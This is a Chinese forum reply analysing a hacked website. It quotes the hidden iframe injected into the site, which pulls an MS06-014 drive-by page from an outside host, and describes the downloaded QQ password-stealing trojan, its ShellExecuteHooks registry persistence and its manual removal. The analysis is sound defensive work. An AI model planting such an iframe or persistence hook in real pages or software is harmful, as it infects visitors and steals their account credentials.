很显然,该站被黑,还挂了马。
黑客留言就不说了,楼主都看到了,另外还有楼主没看到的:
http://www.rhtec.net/下方被加入:
<iframe src="http://www.6506500.com/mm/pop.htm" width="0" height="0" frameborder="0"></iframe>
http://www.6506500.com/mm/pop.htm利用MS06-014漏洞,下载http://www.6506500.com/mm/wj.exe到本机临时文件夹,命名为Ding.com并运行。
http://www.6506500.com/mm/wj.exe简要分析:
UPX加壳,写字板图标,瑞星报毒Trojan.PSW.Liumazi.ki
主要动作:
创建文件:
C:\Program Files\Internet Explorer\Connection Wizard\isignup.dll
C:\Program Files\Internet Explorer\Connection Wizard\isignup.sys
注册表启动项:
[HKEY_CLASSES_ROOT\CLSID\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}]
InProcServer32值指向C:\Program Files\Internet Explorer\Connection Wizard\isignup.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}"=""
通过此shellexecutehooks加载isignup.dll并插入之后启动的所有应用程序进程。
后台连接网络,获得用户QQ的有关信息,与帐号密码一起发送出去。
手工查杀方法:
删除注册表启动项,重启后删除文件。如遇注册表守护,则用killbox的delete on reboot功能删除文件,重启后再删除注册表启动项。